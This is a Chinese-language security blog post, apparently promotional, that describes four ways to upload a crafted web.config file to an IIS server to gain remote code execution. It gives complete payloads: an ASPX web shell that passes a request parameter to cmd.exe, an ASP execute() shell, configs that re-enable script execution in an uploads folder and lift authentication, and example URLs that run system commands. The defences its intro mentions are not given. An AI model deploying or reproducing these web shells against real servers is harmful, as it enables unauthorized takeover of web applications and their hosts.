技术精华 | .NET 四种方法上传 web.config 绕过限制实现 RCE

发布于 作者:

技术精华 | .NET 四种方法上传 web.config 绕过限制实现 RCE

专攻.NET安全的 dotNet安全矩阵 2025-06-02 00:40

图片

在 .NET Web 应用安全领域,web.config 文件不仅仅是一个普通的配置文件,还能成为攻击者绕过安全限制、执行任意代码的重要工具。本篇文章将系统性地介绍 四种 基于 web.config 绕过限制并执行代码的技术
,结合真实案例,深入剖析其利用方式及相应防御措施。

01. 端午假期专属福利

限时优惠

前10名新成员可享 40元专属立减券
,助您轻松加入国内顶级.NET安全学
习圈,
解锁国内顶尖,名额有限,先到先得!

02.作为.NET脚本执行

当 IIS 服务器 仅支持 .NET 运行环境
,且无法上传 .aspx、.asmx、.soap 等扩展名的文件时,攻击者可以尝试上传特制的 web.config,让其作为 .NET 脚本运行。

2.1 核心原理

攻击者可以上传以下 web.config 文件,使其 .config 文件扩展名被当作 .aspx 解析,并执行动态 .NET 代码: 

<configuration><system.web><compilation defaultLanguage="cs"><buildProviders><add extension=".config" type="System.Web.Compilation.PageBuildProvider"/></buildProviders></compilation><httpHandlers><add path="web.config" type="System.Web.UI.PageHandlerFactory" verb="*"/></httpHandlers></system.web></configuration><%if(flag){System.Diagnostics.Process process =newSystem.Diagnostics.Process();    process.StartInfo.FileName ="cmd.exe";string str = Request["c"];    process.StartInfo.Arguments ="/c "+ str;    process.StartInfo.RedirectStandardOutput =true;    process.StartInfo.RedirectStandardError =true;    process.StartInfo.UseShellExecute =false;    process.Start();string str2 = process.StandardOutput.ReadToEnd();    Response.Write("<pre>"+ str2 +"</pre>");    Response.Flush();    Response.End();}%>

攻击者访问以下 URL,可直接执行系统命令:upload/web.config?c=tasklist,如下图所示

image.png

注意:web.config必须上传到 站点根目录
,否则可能无法解析。

03.作为ASP脚本运行

如果 IIS 支持 ASP 运行环境,但无法上传 .asp 文件,攻击者可以上传 web.config,使其作为 ASP 代码解析。上传以下 web.config,让 .config 文件扩展名被当作 .asp 解析,并执行 ASP 代码: 

<configuration><system.webServer><handlers accessPolicy="Read, Script, Write"><add name="web_config" path="*.config" verb="*"                 modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll"                 resourceType="Unspecified" requireAccess="Write" preCondition="bitness64"/></handlers><security><requestFiltering><fileExtensions><remove fileExtension=".config"/></fileExtensions><hiddenSegments><remove segment="web.config"/></hiddenSegments></requestFiltering></security></system.webServer></configuration><!--<%Response.write("->"&1+2&"<-")on error resume nextifexecute(request("dotnet"))<>""thenexecute(request("dotnet"))%>-->

攻击者访问以下 URL,可执行任意 ASP 代码,页面返回当前服务器的系统时间,证明代码执行成功。 

/upload/web.config?dotnet=response.write(now())

注意:服务器 必须支持 ASP,否则无法解析 .config 作为 ASP 代码。

image.png

04.绕过安全策略限制

某些情况下,管理员会通过 web.config 禁止 uploads/ 目录执行脚本,但仍允许上传文件。攻击者可以上传新的 web.config 重新启用脚本执行权限。上传以下 web.config,重新开放 uploads/ 目录的脚本执行权限: 

<configuration><system.webServer><handlers accessPolicy="Read, Write"></handlers></system.webServer></configuration>

攻击者上传 Shell2asmx.soap 后被禁止运行,如下图所示。

image.png

但此时修改accessPolicy策略,添加写入、执行、运行脚本权限。即accessPolicy=”Read,Write,Execute,Script”,再向uploads目录下上传新配置的这个web.config,即可打开正常界面,如下图所示

image.png

05. 绕过身份认证

.NET web.config 可用于身份认证,默认会拒绝匿名用户访问。只有已登录用户才能访问该目录,一切的匿名访问都被重定向至登录页,重定向的URL地址如下所示。

image.png

最新研究成果:攻击者可以上传 web.config 重新开放目录权限,并执行任意代码。上传以下 web.config,绕过身份认证: 

<configuration><system.web><authorization><allow users="*"/></authorization></system.web></configuration>

然后访问 URL 执行系统命令: 

/upload/web.config?dotnet=Response.Write(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8").exec("cmd.exe /c tasklist").StdOut.ReadAll())

该请求会利用 Response.Write 输出 cmd.exe /c tasklist 的执行结果,即当前系统的进程列表,如下图所示。

image.png

06. 端午假期专属福利

限时优惠

前10名新成员可享 40元专属立减券
,助您轻松加入国内顶级.NET安全学
习圈,
解锁国内顶尖 .NET 安全知识库
,技术干货一网打尽!
与行业大咖同行,探讨实战经验!
恰逢迎接端午节,星球福利送给粉丝们,使用微信扫一扫,扫描下方代金券即可加入星球。